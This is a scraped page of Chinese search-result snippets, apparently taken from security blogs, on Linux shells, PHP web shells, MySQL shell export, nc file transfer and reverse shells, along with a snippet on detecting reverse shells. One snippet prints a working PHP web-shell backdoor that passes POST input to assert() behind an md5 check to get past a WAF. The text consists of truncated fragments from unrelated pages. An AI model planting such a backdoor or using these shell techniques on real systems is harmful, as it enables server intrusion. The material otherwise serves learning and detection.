的小企鵝，寫着Linux shell 才知道shell是Linux獨有的編程語言。 經常聽大佬們講什么 ...

1.mysql執行語句拿shell 2.利用md5繞過waf <?php if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){ assert($_POST['a']); } ?> ...

很老的東西了，但是很多時候會派上用場 mysql一句話導出shell Drop TABLE IF EXISTS temp; //如果存在temp就刪掉Create TABLE temp ...

1、進程 file descriptor 異常檢測 檢測 file descriptor 是否指向一個socket 以重定向+/dev/tcp Bash反彈Shell攻擊方式為例，這類反彈shell的本質可以歸納為file descriptor的重定向到一個socket句柄。 2、檢測 ...

1.1發送文件(公網發內網) 文件發送端： nc -lp 6666 < 文件 文件接收端： nc 發送端ip 發送端端口 > 新文件 1.2發送文件(內網發公網)文件發送端： nc -lp 6666 > 文件 文件接收端： nc ...

0x00 eval和assert的區別 http://www.vuln.cn/8395 http://www.php.net/manual/zh/function.eval.php http ...

問題 配置虛擬環境需要指定隨機mac地址防止沖突 實現 先說結論 感興趣的朋友可以繼續看分析部分 思路 使用shell腳本生成6段00-ff的隨機十六進制數 最后兩兩分割用 : 拼接為合法的mac地址 隨機數 利用環境變量RANDOM,范圍是0--32767 這里直接用echo ...

Linux 反彈shell（二）反彈shell的本質 from: https://xz.aliyun.com/t/2549 0X00 前言 在上一篇文章 Linux反彈shell（一）文件描述符與重定向，我們已經討論過了反彈shell中最核心也是 ...